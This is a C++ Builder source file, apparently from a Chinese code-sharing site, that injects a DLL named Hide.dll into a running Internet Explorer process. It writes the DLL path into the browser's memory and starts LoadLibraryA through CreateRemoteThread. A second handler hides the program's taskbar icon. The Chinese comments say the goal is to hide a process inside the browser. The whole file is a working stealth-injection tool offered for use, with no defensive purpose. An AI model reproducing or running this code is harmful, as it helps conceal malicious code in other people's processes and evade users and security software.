📄 unit1.cpp
字号:
//---------------------------------------------------------------------------
#include <vcl.h>
#pragma hdrstop
#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>//该头文件包涵了进程操作的API函数
#include "Unit1.h"
//---------------------------------------------------------------------------
#pragma package(smart_init)
#pragma resource "*.dfm"
TForm1 *Form1;
AnsiString pszLibFileName;//存放待隐藏的DLL文件名
HANDLE hProcessSnap=NULL;//进程快照句柄
HANDLE hRemoteProcess;//远程进程句柄
LPVOID pszLibFileRemote;//远程进程中分配给文件名的空间
HMODULE phmd;//存放kernel32.dll句柄
HANDLE hRemoteThread1=NULL;//存放远程线程句柄
//---------------------------------------------------------------------------
__fastcall TForm1::TForm1(TComponent* Owner)
: TForm(Owner)
{
}
//---------------------------------------------------------------------------
void __fastcall TForm1::Button1Click(TObject *Sender)
{
PROCESSENTRY32 pe32={0};
DWORD dwRemoteProcessId;
hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
//打开进程快照
if(hProcessSnap==(HANDLE)-1)
{
MessageBox(NULL,"CreateToolhelp32Snapshot failed","",MB_OK);
exit(0);
} //失败返回
pe32.dwSize=sizeof(PROCESSENTRY32);
if(Process32First(hProcessSnap,&pe32)) //获取第一个进程
{
do{
AnsiString te;
te=pe32.szExeFile;
if(te.Pos("iexplore.exe")|| te.Pos("IEXPLORE.EXE"))//找到宿主进程,以IEXPLORE.EXE为例
{ dwRemoteProcessId=pe32.th32ProcessID;
break;
}
}
while(Process32Next(hProcessSnap,&pe32));//获取下一个进程
}
else
{
MessageBox(NULL,"取第一个进程失败","",MB_OK);
exit(0);
}
hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE,FALSE,dwRemoteProcessId);
//打开远程进程
pszLibFileName=GetCurrentDir()+"\\"+"Hide.dll";
// 假设hide.dll是待隐藏的进程
int cb=(1+pszLibFileName.Length())*sizeof(char);
//计算dll文件名长度
pszLibFileRemote=(PWSTR)VirtualAllocEx(hRemoteProcess,NULL,cb+100,MEM_COMMIT,PAGE_READWRITE);
//申请存放文件名的空间
bool ReturnCode=WriteProcessMemory(hRemoteProcess,pszLibFileRemote,(LPVOID)pszLibFileName.c_str(),cb,NULL);
//把dll文件名写入申请的空间
phmd=GetModuleHandle("kernel32.dll");
LPTHREAD_START_ROUTINE fnStartAddr=(LPTHREAD_START_ROUTINE)GetProcAddress(phmd,"LoadLibraryA");
//获取动态链接库函数地址
hRemoteThread1=CreateRemoteThread(hRemoteProcess,NULL,0,fnStartAddr,pszLibFileRemote,0,NULL);
//创建远程线程
if(hRemoteThread1!=NULL)
CloseHandle(hRemoteThread1);//关闭远程线程
if(hProcessSnap!=NULL)
CloseHandle(hProcessSnap);//关闭进程快照
}
//---------------------------------------------------------------------------
void __fastcall TForm1::Button2Click(TObject *Sender)
{
ShowMessage(GetCurrentDir()+"\\"+"Project1.exe");
ShowWindow(Application->Handle, SW_HIDE);//隐藏任务栏图标
}
//---------------------------------------------------------------------------
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -